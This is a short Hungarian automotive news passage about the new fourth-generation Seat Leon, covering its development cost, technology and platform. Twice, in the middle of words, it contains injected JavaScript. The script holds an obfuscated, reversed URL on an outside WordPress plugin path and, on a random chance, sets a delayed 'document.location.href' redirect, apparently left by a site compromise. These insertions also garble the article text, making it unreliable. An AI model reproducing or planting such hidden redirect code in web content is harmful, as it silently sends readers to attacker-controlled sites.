Negyedik generációjához ért a Seat Leon. A típus teljes fejlesztési költsége 1,1 milliárd euróra (kb. 366 milliárd Ft) rúgott – ebben a gyártóüzem felkészítése is benne van –, így érthetően nagy reményeket fűz hozzá gyártója. Nem alaptalanul: soha nem adott még el annyi autót egy évben a spanyol márka, mint tavaly, és mivel a Leon nem crossover – azaz nem adja el magát puszta létezésével –, telepakolták modern kommunikációs, biztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonsági és környezetvédelmi technológiákkal. A Leon formailag az elődmodell evolúciójának tekinthető, bár valójában minden részlete megváltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozott; a közegellenállási együttható 8 százalékkal javult. Az új autó az MQB Evo platformra épül. Az…
- Hirdetés -